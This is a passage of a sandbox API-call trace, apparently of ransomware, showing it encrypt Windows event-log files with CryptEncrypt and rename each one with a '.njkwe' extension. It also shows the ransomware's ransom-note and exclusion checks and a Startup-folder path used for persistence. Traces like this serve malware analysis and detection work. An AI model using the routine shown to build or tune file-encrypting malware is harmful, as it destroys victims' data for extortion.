hHeap=0xbe0000) returned 1 [0066.625] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.625] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.626] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.626] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.626] CloseHandle (hObject=0x428) returned 1 [0066.628] GetProcessHeap () returned 0xbe0000 [0066.628] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.628] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx_r00t_{3sXlE5}.njkwe") returned 106 [0066.628] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.628] GetProcessHeap () returned 0xbe0000 [0066.628] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.628] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe24cdef0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xe24cdef0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-ReadyBoost%4Operational.evtx", cAlternateFileName="MIB9D2~1.EVT")) returned 1 [0066.628] lstrcmpiW (lpString1="Microsoft-Windows-ReadyBoost%4Operational.evtx", lpString2="Windows") returned -1 [0066.629] lstrcmpiW (lpString1="Microsoft-Windows-ReadyBoost%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0066.629] lstrcmpiW (lpString1="Microsoft-Windows-ReadyBoost%4Operational.evtx", lpString2="System Volume Information") returned -1 [0066.629] lstrcmpiW (lpString1="Microsoft-Windows-ReadyBoost%4Operational.evtx", lpString2="Program Files") returned -1 [0066.629] lstrcmpiW (lpString1="Microsoft-Windows-ReadyBoost%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0066.629] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 58 [0066.629] StrStrIW (lpFirst="Microsoft-Windows-ReadyBoost%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0066.629] lstrcmpW (lpString1="Microsoft-Windows-ReadyBoost%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.629] lstrcmpW (lpString1="Microsoft-Windows-ReadyBoost%4Operational.evtx", lpString2="taridd") returned -1 [0066.629] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.629] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.629] GetTickCount () returned 0x11510d5 [0066.629] GetTickCount () returned 0x11510d5 [0066.629] GetTickCount () returned 0x11510d5 [0066.629] GetTickCount () returned 0x11510d5 [0066.629] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.629] GetProcessHeap () returned 0xbe0000 [0066.629] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.629] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.656] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.656] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.657] GetProcessHeap () returned 0xbe0000 [0066.657] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.657] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.657] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.657] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.657] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.657] CloseHandle (hObject=0x428) returned 1 [0066.660] GetProcessHeap () returned 0xbe0000 [0066.660] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.660] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 78 [0066.660] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.661] GetProcessHeap () returned 0xbe0000 [0066.661] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.661] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd125335f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd125335f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", cAlternateFileName="MI7A67~1.EVT")) returned 1 [0066.661] lstrcmpiW (lpString1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", lpString2="Windows") returned -1 [0066.661] lstrcmpiW (lpString1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0066.661] lstrcmpiW (lpString1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", lpString2="System Volume Information") returned -1 [0066.661] lstrcmpiW (lpString1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", lpString2="Program Files") returned -1 [0066.661] lstrcmpiW (lpString1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0066.661] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 76 [0066.661] StrStrIW (lpFirst="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0066.661] lstrcmpW (lpString1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.661] lstrcmpW (lpString1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", lpString2="taridd") returned -1 [0066.661] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.661] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.661] GetTickCount () returned 0x11510f4 [0066.661] GetTickCount () returned 0x11510f4 [0066.661] GetTickCount () returned 0x11510f4 [0066.661] GetTickCount () returned 0x11510f4 [0066.661] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.661] GetProcessHeap () returned 0xbe0000 [0066.662] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.662] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.663] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.663] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.664] GetProcessHeap () returned 0xbe0000 [0066.664] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.664] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.664] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.664] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.664] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.664] CloseHandle (hObject=0x428) returned 1 [0066.666] GetProcessHeap () returned 0xbe0000 [0066.666] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.666] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 96 [0066.666] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.667] GetProcessHeap () returned 0xbe0000 [0066.667] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.667] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1fe2941, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd1fe2941, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-SettingSync%4Debug.evtx", cAlternateFileName="MI3773~1.EVT")) returned 1 [0066.667] lstrcmpiW (lpString1="Microsoft-Windows-SettingSync%4Debug.evtx", lpString2="Windows") returned -1 [0066.667] lstrcmpiW (lpString1="Microsoft-Windows-SettingSync%4Debug.evtx", lpString2="$Recycle.bin") returned 1 [0066.667] lstrcmpiW (lpString1="Microsoft-Windows-SettingSync%4Debug.evtx", lpString2="System Volume Information") returned -1 [0066.667] lstrcmpiW (lpString1="Microsoft-Windows-SettingSync%4Debug.evtx", lpString2="Program Files") returned -1 [0066.667] lstrcmpiW (lpString1="Microsoft-Windows-SettingSync%4Debug.evtx", lpString2="Program Files (x86)") returned -1 [0066.667] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 53 [0066.667] StrStrIW (lpFirst="Microsoft-Windows-SettingSync%4Debug.evtx", lpSrch=".njkwe") returned 0x0 [0066.667] lstrcmpW (lpString1="Microsoft-Windows-SettingSync%4Debug.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.667] lstrcmpW (lpString1="Microsoft-Windows-SettingSync%4Debug.evtx", lpString2="taridd") returned -1 [0066.667] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.667] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.669] GetTickCount () returned 0x1151104 [0066.669] GetTickCount () returned 0x1151104 [0066.669] GetTickCount () returned 0x1151104 [0066.669] GetTickCount () returned 0x1151104 [0066.669] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.670] GetProcessHeap () returned 0xbe0000 [0066.670] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.670] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.672] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.672] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.672] GetProcessHeap () returned 0xbe0000 [0066.672] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.672] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.672] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.674] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.674] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.674] CloseHandle (hObject=0x428) returned 1 [0066.707] GetProcessHeap () returned 0xbe0000 [0066.707] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.707] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx_r00t_{3sXlE5}.njkwe") returned 73 [0066.707] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.708] GetProcessHeap () returned 0xbe0000 [0066.708] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.708] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1fe2941, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd1fe2941, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-SettingSync%4Operational.evtx", cAlternateFileName="MI36AA~1.EVT")) returned 1 [0066.708] lstrcmpiW (lpString1="Microsoft-Windows-SettingSync%4Operational.evtx", lpString2="Windows") returned -1 [0066.708] lstrcmpiW (lpString1="Microsoft-Windows-SettingSync%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0066.708] lstrcmpiW (lpString1="Microsoft-Windows-SettingSync%4Operational.evtx", lpString2="System Volume Information") returned -1 [0066.708] lstrcmpiW (lpString1="Microsoft-Windows-SettingSync%4Operational.evtx", lpString2="Program Files") returned -1 [0066.708] lstrcmpiW (lpString1="Microsoft-Windows-SettingSync%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0066.708] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 59 [0066.708] StrStrIW (lpFirst="Microsoft-Windows-SettingSync%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0066.708] lstrcmpW (lpString1="Microsoft-Windows-SettingSync%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.708] lstrcmpW (lpString1="Microsoft-Windows-SettingSync%4Operational.evtx", lpString2="taridd") returned -1 [0066.708] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.708] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.709] GetTickCount () returned 0x1151133 [0066.709] GetTickCount () returned 0x1151133 [0066.709] GetTickCount () returned 0x1151133 [0066.709] GetTickCount () returned 0x1151133 [0066.709] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.709] GetProcessHeap () returned 0xbe0000 [0066.709] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.709] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.711] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.711] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.711] GetProcessHeap () returned 0xbe0000 [0066.711] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.711] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.711] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.711] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.711] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.712] CloseHandle (hObject=0x428) returned 1 [0066.714] GetProcessHeap () returned 0xbe0000 [0066.714] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.714] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 79 [0066.714] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.714] GetProcessHeap () returned 0xbe0000 [0066.714] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.714] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3852b12, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd3852b12, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", cAlternateFileName="MI2E2E~1.EVT")) returned 1 [0066.714] lstrcmpiW (lpString1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", lpString2="Windows") returned -1 [0066.714] lstrcmpiW (lpString1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", lpString2="$Recycle.bin") returned 1 [0066.714] lstrcmpiW (lpString1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", lpString2="System Volume Information") returned -1 [0066.714] lstrcmpiW (lpString1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", lpString2="Program Files") returned -1 [0066.714] lstrcmpiW (lpString1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", lpString2="Program Files (x86)") returned -1 [0066.714] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 59 [0066.714] StrStrIW 